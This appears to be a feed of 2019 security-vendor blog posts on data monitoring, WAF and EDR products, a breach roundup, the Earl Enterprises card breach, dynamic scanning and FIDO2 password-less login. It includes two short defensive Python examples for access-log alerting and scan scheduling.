For everything that can be done to your data, there should be a way for you to monitor it. That is not to say that you have to micro-manage every aspect of your big data. But if an incident were to occur, or more realistically when an incident occurs, you should be able to construct an image of what was going on at the time of the event. For this to be possible, you need a way to monitor your data and receive alerts on the incidents.

Tips for Monitoring & Alerting:

  • Adversaries do not keep normal business hours, so be sure you are monitoring your data at all hours. One way to easily achieve 24/7/365 monitoring is by outsourcing this function to a Managed Security Services Provider (MSSP).
  • When setting up alerts, it can be challenging to find a balance between “alert on every single possible event” and “I only want to see important alerts”. What if an uptick on those seemingly harmless alerts is the only tip-off to an insider threat? And on the other hand, if you are constantly on edge from alerts, you will easily fall into alert fatigue. An MSSP can act as the filter between you and your alerts, only notifying you after an alert is investigated and confirmed to be legitimate.
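The two questions above, what stops a revoked party from still reading data and how an "uptick on seemingly harmless alerts" gets noticed, are easiest to see in code. The example below is my own (not GRA Quantum's tooling): a grant table from which revoked principals have simply been removed, a constructed access log, and two checks over it. The first raises an alert for any access by a principal without an active grant or to a dataset outside its grant; the second compares each principal's low-severity export count for a day against its average on earlier days. All principals, datasets and log lines are constructed.

```python
from collections import Counter, defaultdict
from typing import Dict, List, Set, Tuple

# Current grants: principal -> datasets it may touch. Revoking access means
# removing the principal (or dataset) here. "acme-api" was a partner feed
# whose grant was removed when the contract ended, so it is absent. (Constructed.)
ACTIVE_GRANTS: Dict[str, Set[str]] = {
    "alice": {"sales_2018", "sales_2019"},
    "bob": {"sales_2018"},
}

# Constructed access-log lines: "timestamp principal action dataset rows=N".
SAMPLE_LOG = """\
2019-04-01T09:12:00 alice export sales_2018 rows=1200
2019-04-01T15:40:00 alice export sales_2019 rows=800
2019-04-02T09:05:00 alice export sales_2018 rows=1100
2019-04-02T16:01:00 alice export sales_2019 rows=950
2019-04-03T08:50:00 alice export sales_2018 rows=1000
2019-04-03T08:52:00 alice export sales_2019 rows=1000
2019-04-03T08:55:00 alice export sales_2018 rows=1000
2019-04-03T08:57:00 alice export sales_2019 rows=1000
2019-04-03T09:01:00 alice export sales_2018 rows=1000
2019-04-03T09:04:00 alice export sales_2019 rows=1000
2019-04-03T09:08:00 alice export sales_2018 rows=1000
2019-04-03T09:11:00 alice export sales_2019 rows=1000
2019-04-03T09:15:00 alice export sales_2018 rows=1000
2019-04-03T10:00:00 bob export hr_salaries rows=300
2019-04-03T10:05:00 acme-api query sales_2019 rows=50000
"""


def parse_log(text: str) -> List[Dict[str, str]]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, principal, action, dataset, rows = line.split()
        events.append({"ts": ts, "day": ts[:10], "principal": principal,
                       "action": action, "dataset": dataset,
                       "rows": rows.split("=", 1)[1]})
    return events


def check_grants(events: List[Dict[str, str]],
                 grants: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Every access is checked against the grant table at the time of review,
    so a revoked principal shows up the moment it touches anything."""
    alerts = []
    for e in events:
        allowed = grants.get(e["principal"])
        if allowed is None:
            alerts.append(("revoked-or-unknown-principal", e["principal"], e["dataset"]))
        elif e["dataset"] not in allowed:
            alerts.append(("out-of-scope-dataset", e["principal"], e["dataset"]))
    return alerts


def export_upticks(events: List[Dict[str, str]], day: str,
                   factor: float = 3.0, min_count: int = 5) -> Dict[str, Tuple[float, int]]:
    """Principals whose exports on `day` reach `factor` times their average on
    earlier days (and at least `min_count`, so a first-ever export is not noise).
    Returns principal -> (baseline per day, count on `day`)."""
    per_day: Dict[str, Counter] = defaultdict(Counter)
    for e in events:
        if e["action"] == "export":
            per_day[e["principal"]][e["day"]] += 1
    flagged: Dict[str, Tuple[float, int]] = {}
    for principal, counts in per_day.items():
        today = counts.get(day, 0)
        prior = [c for d, c in counts.items() if d < day]
        baseline = sum(prior) / len(prior) if prior else 0.0
        if today >= min_count and today >= factor * baseline:
            flagged[principal] = (baseline, today)
    return flagged


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(check_grants(evs, ACTIVE_GRANTS))
    print(export_upticks(evs, "2019-04-03"))
```

The individual export events would never justify paging anyone; it is the comparison with the principal's own history that turns nine routine-looking events into one alert worth a look, which is the filtering role the text assigns to an MSSP.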

When you are in possession of big data, there is a lot on the line to secure. When a breach of this magnitude can destroy your business, it is critical that you take these factors into consideration.

The post 3 Factors to Consider When Securing Big Data appeared first on GRA Quantum.

Experience AI In Action Through Your Security Dashboard


Following a series of QA testing stages conducted by Cloudbric’s development and product planning teams, Cloudbric is ready to announce the beta release of its deep learning engine!

We’ve already discussed extensively what this new AI technology will mean for our existing detection capabilities as well as the role it will play in our upcoming security platform.

To reiterate, VISION will be integrated into our existing detection system in order to amplify the accuracy of cyber threat identification by blocking incoming threats.

One of the biggest challenges for cloud-based WAF vendors is the ability to accurately block malicious traffic without the need to later whitelist or blacklist traffic that was mistakenly identified and blocked, and without allowing actual malicious traffic to seep through the cracks.

When using a WAF we want to avoid both these false positives and false negatives.

Luckily for us, AI can directly address this challenge as its predictive analysis capabilities can be applied to web traffic.

Cloudbric’s WAF is recognized in the industry for its high accuracy rate, and the addition of AI capabilities will allow our filtering system to more intelligently block attacks.

Current users will now be able to inspect their own web traffic and identify behavior anomalies and in turn help VISION learn characteristics of web attacks to improve our filtering system (and subsequently reduce false positives and false negatives).

VISION will learn the traffic characteristics of each user website to execute detection and prevention tailored to each website. In other words, it will predict and recognize various attack patterns that may act as potential risks to individual user websites.

Ready to see it in action?

More on how to do this can be found directly on your dashboard!

Within the second quarter, we have plans to offer this feature via our recently launched console app, so be on the lookout for that as well.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Experience AI In Action Through Your Security Dashboard appeared first on Cloudbric.

Cyber Security Roundup for March 2019

The potential threat posed by Huawei to the UK national infrastructure continues to be played out. GCHQ called for a ban on Huawei technology within UK critical networks such as 5G networks, while Three said a Huawei ban would delay the UK 5G rollout, and the EU ignored US calls to ban Huawei in 5G rollouts while promoting the EU Cybersecurity certification scheme to counter the Chinese IT threat, which is all rather confusing. Meanwhile, Microsoft researchers found an NSA-style backdoor in Huawei laptops, which Microsoft reported to Huawei, leading to the flaw being patched in January 2019.
A serious security flaw placed Royal Bank of Scotland (RBS) customers at risk. The vulnerability was discovered by PenTest Partners in the bank-provided 'Heimdal Thor' security software, which was meant to protect NatWest customers from cyber-attacks but actually permitted remote command injection at the customer's endpoint. PenTest Partners said: "We were able to gain access to a victim's computer very easily. Attackers could have had complete control of that person's emails, internet history and bank details. To do this we had to intercept the user's internet traffic but that is quite simple to do when you consider the unsecured public wi-fi out there, and it's often all too easy to compromise home wi-fi setups."

Facebook made negative security headlines yet again after it disclosed that 20,000 of its employees had access to hundreds of millions of user account passwords for years.

One of the world’s biggest aluminium producers, Norsk Hydro, suffered production outages after a ransomware outbreak impacted its European and US operations. Damages from the ransomware attack on Norsk Hydro reach as high as $40M.

Citrix disclosed a security breach of its internal network that may have compromised 6Tb of sensitive data. The FBI had told Citrix that international cyber criminals had likely gained access to its internal network. Citrix said in a statement that it had taken action to contain the breach: “We commenced a forensic investigation; engaged a leading cyber security firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI”. According to security firm Resecurity, the attacks were perpetrated by an Iranian-linked group known as IRIDIUM.

Credit monitoring firm Equifax admitted in a report that it did not follow its own patching schedule, neglecting to patch Apache Struts, which led to the major 2017 breach that impacted 145 million people. The report also said Equifax delayed alerting its customers for 6 weeks after detecting the breach.

ASUS computers had backdoors added through its software update system, in an attack coined “ShadowHammer”. Kaspersky researchers estimated malware was distributed to nearly a million people, although the cybercriminals appeared to have only targeted 600 specific devices. Asus patched the vulnerability but questions still remain.


The top 10 biggest breaches of 2018 according to 4iQ were:
  1. Anti-Public Combo Collections (Hacked): Sanixer Collection #1-6, 1.8 billion unique email addresses.
  2. Aadhaar, India (Open third-party device): 1.1 billion people affected.
  3. Marriott Starwood Hotels (Hacked): 500 million guests' PII.
  4. Exactis (Open device): 340 million people and businesses.
  5. HuaZhu Group (Accidental exposure): 240 million records.
  6. Apollo (Open device): 150 million app users.
  7. Quora (Hacked): 100 million users.
  8. Google+ (API glitch): 52.2 million users.
  9. Chegg (Hacked): 40 million accounts.
  10. Cathay Pacific Airways (Targeted attack): 9.4 million passengers.
Barracuda Networks reported the top 12 phishing email subject lines, after they analysed 360,000 phishing emails over a three-month period.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Why Traditional EDR Doesn’t Solve Today’s Modern Threats

Today’s cyberattacks are more advanced and complex than ever before. It’s no surprise that enterprises can no longer rely on traditional endpoint detection and response (EDR) solutions to protect against the evolving threat landscape. With the amount of data rapidly expanding in conjunction with an increasing number of endpoints, enterprise IT departments are facing new management and security challenges. EDR can provide businesses with another layer of threat detection in a multilayered security approach.

Cyberthreats Have Evolved, So Should Your Security

The impact of a cyberattack is no longer siloed to one employee’s device. It has the ability, speed, and scope to impact your entire business in mere seconds. And it’s hard not to think of cybersecurity as being the never-ending game of cat-and-mouse, with cybercriminals constantly developing new skills, updating code, and deploying new tactics to get inside your endpoints. But instead of your organization trying to play catch up, get ahead of malicious actors by developing a comprehensive security strategy to prevent attacks before they happen.

Many cyberthreats use multiple attack mechanisms, which means just one form of security is no longer enough to keep your entire enterprise secure from malicious actors. And although some anti-virus software can’t keep up with new malware or variants of known malware, it still plays an important role in a multilayered approach for a robust cybersecurity strategy. Endpoint detection and response is also essential when developing a comprehensive security approach. It offers a threat detection capability, allowing your next-generation solution to track down potential threats if they break through the first layer of your digital perimeter.

The Importance of EDR

The SANS Endpoint Protection and Response Survey reports that 44% of IT teams manage between 5,000 and 500,000 endpoints across their networks. Each of these endpoints becomes an open door for a potential cyberattack. Given the increasing number of endpoints, organizations are beginning to understand that they’re more susceptible to breaches and are willing to adopt a multilayered security approach to prevent as many attacks as possible.

With endpoint detection and response, organizations have granular control and visibility into their endpoints to detect suspicious activity. There are new features and services for EDR, expanding its ability to detect and investigate threats. An EDR solution can discover and block threats in the pre-execution stage, investigate threats through analytics, and help provide an incident response plan. Additionally, some EDR solutions can leverage AI and machine learning to automate the steps in an investigative process. These new capabilities can learn an organization’s baseline behaviors and use this information, along with a variety of other threat intelligence sources, to interpret findings.

Incorporating EDR Into Your Security Strategy

The adoption of EDR is projected to increase significantly over the next few years. According to Stratistics MRC’s Endpoint Detection and Response – Global Market Outlook (2017-2026), sales of EDR solutions—both on-premises and cloud-based—are expected to reach $7.27 million by 2026, with an annual growth rate of nearly 26%.

When adopting EDR into your security portfolio, the application should have three basic components: endpoint data collection agents, automated response, and analysis and forensics. McAfee MVISION Endpoint Detection and Response (EDR) helps you get ahead of modern threats with AI-guided investigations that surface relevant risks and automate and remove the manual labor of gathering and analyzing evidence.

For more information on endpoint detection and response, check out our Security Awareness page and the McAfee Endpoint Security portfolio of products.

The post Why Traditional EDR Doesn’t Solve Today’s Modern Threats appeared first on McAfee Blogs.

ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty

In this episode, we’ll hear from Wayne Anderson, Enterprise Security Architect at McAfee and Dan Flaherty from the cloud security product team speak on a wide range of topics from upcoming technology trends in the market, to adversarial machine learning, cloud models for security, and a look back at the RSA conference.

The post ST03: Cloud Technology Trends with Wayne Anderson and Dan Flaherty appeared first on McAfee Blogs.

Veracode Dynamic Analysis: Reduce the Risk of a Breach

This blog post has been updated as of April 2, 2019

Veracode Dynamic Analysis is a dynamic scanning solution that features automation, depth of coverage, and unmatched scalability. Built on microservices and cloud technologies, the Veracode Dynamic Analysis solution is available on the Veracode SaaS platform. Veracode Dynamic Analysis helps both vulnerability managers tasked with safeguarding the entire web application portfolio, and AppSec managers tasked with safeguarding critical applications in pre-production. With the frameworks developers use to build web applications changing often, and the push toward single page applications, Veracode Dynamic Analysis gives you the automated dynamic scanning you need to find vulnerabilities quickly and accurately.

Benefits of Scheduling Automation

Consistent dynamic scanning is key to keeping your web applications safe, and consistent scanning is achievable with an automated dynamic scanning solution. Imagine your CISO tells you to scan your web apps as often as feasible. Depending on remediation frequency, you come up with a quarterly, monthly, or weekly scanning schedule. To add additional complexity, IT gives you a maintenance window when dynamic scanning cannot occur. If you’re part of a global company, you also have time zones to contend with, making it virtually impossible to depend on a manual pause and resume, not to mention the inconvenience of waking up at 3:00 AM to pause a running scan. With all these variables to handle, you need a dynamic scanning solution that provides true automation to handle scheduling and IT maintenance windows, so you can “set it and forget it.” 

Recurring Scan Scheduling provides the ability to set up a schedule such that the application can be automatically scanned on a weekly, monthly, or quarterly cadence (or anything in between). Once the schedule has been set up, the dynamic scan will kick off automatically at the defined cadence. If the scan has been set up to start on a Tuesday, it will maintain that start day for the weekly scans to avoid running into weekends and holidays.

Automated Pause & Resume provides the ability to designate a maintenance window when the applications won’t be scanned. Dynamic scanning will be automatically paused when the IT maintenance window begins and automatically resume when the applications can be scanned. The pause and resume functionality has been built to ensure scanning resumes where it left off, with the goal of full coverage.

The screenshot below shows how to set up a weekly recurring scan that runs year round, pauses at midnight, and resumes at 4:00 AM each day.

  • Each week the application is dynamically scanned with the automated schedule and scan kick-off.
  • The system automatically pauses at the start of the maintenance window at 12:00 AM and resumes scanning at 4:00 AM.
  • You can adjust the duration based on the size of the application and the number of applications scanned in the batch to get the best coverage.
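The scheduling behaviour described above (a weekly start day that is kept, a daily maintenance window during which scanning pauses, and a resume that picks up where it left off) is simple enough to work through in code. The example below is my own, not Veracode's scheduler; it models the page's 12:00 AM to 4:00 AM window and a Tuesday 10 PM start, and the amount of scanning work (six hours) is a constructed figure.

```python
from datetime import datetime, time, timedelta
from typing import Dict, List, Tuple


def in_maintenance(ts: datetime, start: time, end: time) -> bool:
    """True while ts falls inside the daily [start, end) window.
    A window that crosses midnight (e.g. 22:00 to 02:00) is handled too."""
    t = ts.time()
    if start <= end:
        return start <= t < end
    return t >= start or t < end


def next_scan_start(after: datetime, weekday: int, at: time) -> datetime:
    """First occurrence of `weekday` (Monday=0) at time `at` strictly after
    `after`. Anchoring on the weekday is what keeps a weekly scan on its day."""
    candidate = datetime.combine(after.date(), at)
    candidate += timedelta(days=(weekday - candidate.weekday()) % 7)
    if candidate <= after:
        candidate += timedelta(days=7)
    return candidate


def window_end(ts: datetime, end: time) -> datetime:
    """End of the maintenance window that contains ts."""
    e = datetime.combine(ts.date(), end)
    return e if e > ts else e + timedelta(days=1)


def next_window_start(ts: datetime, start: time) -> datetime:
    """Next moment at which the maintenance window opens, strictly after ts."""
    s = datetime.combine(ts.date(), start)
    return s if s > ts else s + timedelta(days=1)


def scan_segments(start: datetime, required: timedelta, pause_start: time,
                  pause_end: time) -> List[Tuple[datetime, datetime]]:
    """Split `required` scanning work into the runs the scanner can actually
    perform: it pauses when the window opens and resumes, with the remaining
    work intact, when the window closes."""
    segments: List[Tuple[datetime, datetime]] = []
    now, remaining = start, required
    while remaining > timedelta(0):
        if in_maintenance(now, pause_start, pause_end):
            now = window_end(now, pause_end)       # resume at the window's end
            continue
        run = min(remaining, next_window_start(now, pause_start) - now)
        segments.append((now, now + run))
        now += run
        remaining -= run
    return segments


def demo_schedule() -> Dict[str, object]:
    """Weekly Tuesday 22:00 scan needing six hours of work, with the page's
    00:00 to 04:00 maintenance window. ISO strings make the result easy to read."""
    pause_start, pause_end = time(0, 0), time(4, 0)
    start = next_scan_start(datetime(2019, 4, 1, 12, 0), weekday=1, at=time(22, 0))
    segs = scan_segments(start, timedelta(hours=6), pause_start, pause_end)
    return {
        "start": start.isoformat(),
        "segments": [(a.isoformat(), b.isoformat()) for a, b in segs],
        "elapsed_hours": (segs[-1][1] - segs[0][0]).total_seconds() / 3600,
    }


if __name__ == "__main__":
    print(demo_schedule())
```

The point the numbers make: six hours of work takes ten hours of wall-clock time once the four-hour window is honoured, which is the "adjust the duration based on the size of the application" trade-off in the list above.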

Authenticated Batch Scanning provides the ability to increase coverage by scanning behind the login screen, using a multitude of login mechanisms such as auto login, basic authentication, or uploading a login script. You can depend on the pre-scan feature to provide accurate feedback on the connection and authentication for the application under test, so you can fix any access issues ahead of the scheduled start time. In addition, a batch of scans can be kicked off at the same time to allow concurrent scanning with authentication. You save a lot of time when all applications can be concurrently scanned, with coverage for single page applications, modern frameworks such as Angular and ReactJS, and the ability to cover large web applications quickly.

Dynamic Analysis makes it easy to onboard applications and provides multiple input mechanisms. Uploading a CSV file is a quick way for large and small companies to take advantage of scanning applications concurrently.

Internal Scanning Management with Veracode Dynamic Analysis

There are many reasons for an application to live behind a firewall, beyond it still being in the development process and waiting for test and quality assurance checks. Some applications are used for more sensitive financial operations and HR purposes, while others are used in highly regulated industries like healthcare and financial services. Even more simply, organizations use many applications internally and there is no reason for them to expose them externally. Historically, the end user has had to install a Virtual Scan Appliance within their environment and send scan data through an insecure midpoint so the vendor can actually receive the data and return results.

Our Internal Scanning Management feature takes a fresh approach to this challenge by offering a completely new, IT-compliant way to access these behind-the-firewall applications. Rather than using a Virtual Scan Appliance, or an on-premises scanner that is difficult to maintain and does not scale, the Veracode Dynamic Analysis scanner continues to run in the cloud and uses the Secure Scanning Gateway. This gateway connection is completely controlled by the end user. You can open the connection to scan your applications behind the firewall – and close the gateway whenever you’d like. This empowers you not only to scan applications that live behind the firewall, but to apply dynamic testing to applications in the staging environment before they are pushed into production. Below is a screenshot with a gateway and endpoint from the Veracode Platform.

 

Show Me the Results: Consolidated View

Veracode Dynamic Analysis provides visibility into the scanning process to give you peace of mind and comprehensive results once the scanning is complete. The Veracode Platform’s Triage Flaw Viewer provides CWE details, vulnerability severity, along with request/response. In addition, the Platform provides reports to show scan coverage, summary reports for executives, and detailed reports for AppSec teams.

The goal of dynamic scanning is to find exploitable vulnerabilities at runtime, and remediate the issues found. The Dynamic Flaw Inventory provides a dashboard that provides historical vulnerability information, allowing AppSec managers to track team progress toward fixing vulnerabilities. 

Veracode Dynamic Analysis gives you a solution to scan your entire portfolio of web applications with ease, provides accurate results, and puts you on the path to remediate the findings. Even if you are running static scans early in the SDLC, dynamically scanning your web application at runtime uncovers exploitable vulnerabilities that static scans won’t find. Use our dynamic scanning solution to find and remediate flaws before a hacker exploits the vulnerability, resulting in a breach.

I’d love to hear your feedback

Would Veracode Dynamic Analysis benefit your AppSec program and reduce the risk of a breach? I’d like to hear your thoughts. To learn more please download our whitepaper, "Reducing Your Risk of a Breach with Dynamic Analysis," or to schedule a demo now, click here.

How Many Web Applications Does Your Organization Have? It’s More Than You Think

“Automation has saved a tremendous amount of time. We went from a day per app to review and now we are essentially reviewing through automation 18,000 scans a day with only 20 AppSec engineers. You do the math — 18,000 deploys a day with 20 engineers — you can’t scale that manually.”

Senior manager, application and cloud security, insurance, The Total Economic Impact™ of the Veracode Application Security Platform Study

One of the things we pride ourselves on here at Veracode is offering solutions and services that help add a little bit more ease to the application security process. We talk a lot about shifting left, and we do our best to put our money where our mouths are by creating a variety of integrations and automations that empower development teams to adopt a security-first mindset without sacrificing speed or agility. Yet there is more to a complete and holistic application security program than scanning in the CI/CD or making sure you’re securing open source components.

What about all of the web applications that you don’t know or simply forgot about? What about the exploitable vulnerabilities that can only be found at runtime? Or the applications that contain sensitive data and live behind the firewall? In order to ensure the security of these applications – and to make sure you have a proper inventory – you need to conduct discovery and dynamic scans.

What Do You Mean Web Applications I Don’t Know About or Forgot?

It is more common than you would imagine for organizations and brands to have more web apps than they realize. At Veracode, we help our clients create comprehensive application inventories, and we find that those inventories contain, on average, roughly 30 percent more applications than the clients knew about. For example, in M&A activity, more than just a company or brand is acquired – you also acquire their web assets. Further, the digital landscape is decorated with marketing promotional sites meant to attract attention.

Paul Farrington, Veracode CTO in EMEA, is familiar with how common it is to underestimate the extent and reach of an organization’s IT assets. In a project that Veracode conducted for a high street bank, we discovered 1,800 websites that had yet to be logged.

“Their perimeter can be 50% larger than they originally thought it was,” Farrington told the BBC.

It's impossible to secure an entire web application attack surface if you don’t know about all of your applications, and the very thing meant to draw attention to your brand and boost your bottom line is the same target attackers go after to infiltrate your organization. According to the 2018 Verizon Data Breach Investigations Report, web applications continue to be the number one vector for reported breaches. In nearly 90 percent of breaches, it took only minutes for attackers to gain access – and it took months for nearly 70 percent of organizations to detect the systems that had been compromised.

Securing ALL of Your Web Applications With Veracode Discovery + Veracode Dynamic Analysis

Without a solution to help you discover these web applications, you can never be completely certain that you have scanned all of your web applications. This is where Veracode Discovery can help.

Veracode Discovery is a threat intelligence solution that leverages IP ranges, host names, keywords, and other inputs to scan the web for every web application that may be associated with your organization. The results are uploaded to the Veracode Application Security Platform where users can sort through the findings and input them into Veracode Dynamic Analysis through an easy-to-follow workflow. This ensures that you have full visibility into what your organization owns and that you are able to either scan and remediate those applications or sunset them, which improves the organization’s overall security posture.

Veracode Dynamic Analysis is fast, but it’s not just about the speed at which a scan returns results. It’s about the complete workflow – scan start, scan complete, and through to remediation. Veracode Dynamic Analysis is fast because of scheduling automation and a single upload that allows you to batch upload multiple applications into the same analysis. As a SaaS solution, Veracode Dynamic Analysis is able to kick off a scan for hundreds of applications at the same time. Unlike other solutions on the market, Veracode Dynamic Analysis can concurrently scan both authenticated and unauthenticated applications both in front of and behind a firewall. What’s more, the results that you receive are immediately actionable: they contain less than 1 percent false positives thanks to the accuracy of our scanner and limited manual scrubbing.

Veracode Dynamic Analysis covers a wide variety of application frameworks, including Single Page Applications, JavaScript apps, HTML5, Angular, and ReactJS. This gives you the reassurance that Veracode Dynamic Analysis will be able to return results on your applications and provide you with actionable results.

To learn more about Veracode Dynamic Analysis, download our whitepaper, Reducing Your Risk of a Breach with Dynamic Analysis.

Password-less future moves closer as Google takes FIDO2 for a walk

For years, many organisations – and their users – have struggled with the challenge of password management. The technology industry has toiled on this problem by trying to remove the need to remember passwords at all. Recent developments suggest we might finally be reaching a (finger) tipping point.

At Mobile World Congress this year, Google and the FIDO Alliance announced that most devices running Android 7.0 or later can provide password-less logins in their browsers. To clarify, the FIDO2 authentication standard is sometimes called password-less web authentication. Strictly speaking, that’s a slightly misleading name, because people still need to authenticate to their devices using a PIN or a biometric identifier such as a fingerprint. It’s more accurate to say FIDO2 authentication but, not surprisingly, the term ‘password-less’ seems to have caught the imagination.

Wired reported that web developers can now make their sites work with FIDO2, which would mean people can log in to their online accounts on their phones without a password. This feature will be available to an estimated one billion Android devices, so it’s potentially a significant milestone on the road to a password-less future. Last November, Microsoft announced password-less sign-in for its account users, using the same FIDO2 standard. One caveat: Microsoft’s option requires using the Edge browser on Windows 10 build 1809. So the true number of users is likely to be far lower than the 800 million Microsoft had been promising. But this is just the latest place where Microsoft has inserted FIDO technology into its products.

It’s not what you know

I spoke to Neha Thethi, BH Consulting’s senior information security analyst, who gave her reaction to this development. “Through this standard, FIDO and Google pave the way for users to authenticate primarily using ‘something they have’ (the phone) rather than ‘something they know’ (the password). While a fingerprint or PIN would typically be required to unlock the device itself, no shared secret or private key is transferred over the network or stored with the website, as it is in the case of a password. Only a public key is exchanged between the user and the website.”

From the perspective of improving security, Google’s adoption of FIDO2 is a welcome development, Neha added. “Most of the account compromises that we’ve seen in the past few years are because of leaked passwords, on the likes of Pastebin or through phishing, exploited by attackers. The HaveIbeenpwned website gives a sense of the scale of this problem. By that measure, going password-less for logging in to online accounts will definitely decrease the attack surface significantly,” she said.

“The technology that enables this ease of authentication is public key cryptography, and it has been around since the 1970s. The industry has recognised this problem of shared secrets for a long time now. Personally, I welcome this solution to quickly and securely log in to online accounts. It might not be bulletproof, but it takes an onerous task of remembering passwords away from individuals,” she said.

Don’t try to cache me

Organisations have been using passwords for a long time to log into systems that store their confidential or sensitive information. However, even today, many of these organisations don’t have a systematic way of managing passwords for their staff. If an organisation or business wants to become certified to the ISO 27001 security standard, for example, they will need to put in place measures in the form of education, process and technology, to ensure secure storage and use of passwords. Otherwise, you tend to see less than ideal user behaviour like storing passwords on a sticky note or in the web browser cache. “I discourage clients from storing passwords in the browser cache because if their machine gets hacked, the attacker will have access to all that information,” said Neha. 

That’s not to criticise users, she emphasised. “If an organisation is not facilitating staff with a password management tool, they will find the means. They try the best they can, but ultimately they want to get on with their work.”

The credential conundrum

The security industry has struggled with the problem of access and authentication for years. It hasn’t helped itself by shifting the burden onto the people least qualified to do something about it. Most people aren’t security experts, and it’s unfair to expect them to be. Many of us struggle to remember our own phone numbers, let alone a complex password. Yet some companies force their employees to change their passwords regularly. What happens next is the law of unintended consequences in action: people choose a really simple password, or one that barely changes from the one they’d been using before.

For years, many security professionals followed the advice of the US National Institute of Standards and Technology (NIST) for secure passwords. NIST recommended using a minimum of seven characters, and to include numbers, capital letters or special characters. By that measure, a password like ‘Password1’ would meet the recommendations even if no-one would think it was secure.

Poor password advice

Bill Burr, the man who literally wrote the book on passwords for NIST, has since walked back on his own advice. In 2017, he told the Wall Street Journal, “much of what I did I now regret”. He added: “In the end, it was probably too complicated for a lot of folks to understand very well, and the truth is, it was barking up the wrong tree”. NIST has since updated its password advice, and you can find the revised recommendations here.

As well as fending off cybercrime risks, another good reason for implementing good access control is GDPR compliance. Although the General Data Protection Regulation doesn’t specifically refer to passwords, it requires organisations to process personal data in a secure manner. The UK’s Information Commissioner’s Office has published useful free guidance about good password practices with GDPR in mind.

Until your organisation implements password-less login, ensure you protect your current login details. Neha recommends using a pass phrase instead of a password, along with two-factor authentication where possible. People should also use a different pass phrase for each website or online service they use, because reusing the same phrase puts them at risk if attackers compromise any one of those sites: once they get one set of login credentials, they try them on other popular websites to see if they work. She also recommends using a good password manager or password keeper instead of having to remember multiple pass phrases or passwords. Just remember to choose a strong master password to protect all of those other login details!

The post Password-less future moves closer as Google takes FIDO2 for a walk appeared first on BH Consulting.

TGDC Video/Teleconference

In accordance with the Federal Advisory Committee Act (FACA), Public Law 92-463, as amended (5 U.S.C. Appendix 2), the U.S.

Cloudbric Cements Commitment to Cloud Infrastructure And Blockchain Business By Partnering With AWS

Cloudbric currently holds Technology Partner status with Amazon Web Services (AWS).

The AWS Partner Network (APN) is a global partner program composed of cloud software and service vendors that have earned endorsement from AWS after meeting several important criteria.

With the cloud computing market estimated to be worth 272 billion USD worldwide, cloud computing has made it easy to access applications and data from virtually anywhere, without compromising scalability or security. 

Cloudbric’s partnership with AWS has armed us with additional tools and resources from Amazon enabling us to differentiate our solution for AWS customers with improved functionality and cloud security service offerings.

As a Technology Partner, Cloudbric is made-ready for the cloud environment.

Not only that, but as Cloudbric expands into the blockchain business (by currently providing web security services to numerous crypto exchanges and other wallet platforms), we realize cloud infrastructure is more important than ever.

It’s why Cloudbric has announced it has delved into the operation of blockchain wallet nodes.

Exchanges and wallets depend on nodes for stable operation on the blockchain network, and because nodes are hosted in data centres they typically need to run in multiple regions.

As a result, Cloudbric aims to secure the operation and building of blockchain nodes in its existing data centers and servers around the world.

Until now Cloudbric has been able to provide cloud-based security services around the world, and this know-how in cloud infrastructure has led to the signing of blockchain node operation contracts and is expected to draw the attention of companies that operate blockchain wallets.

Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Cements Commitment to Cloud Infrastructure And Blockchain Business By Partnering With AWS appeared first on Cloudbric.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, we are extremely reliant on our GPS devices. In fact, we’re so reliant on them that map features are programmed into almost every IoT device we use, as well as into our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

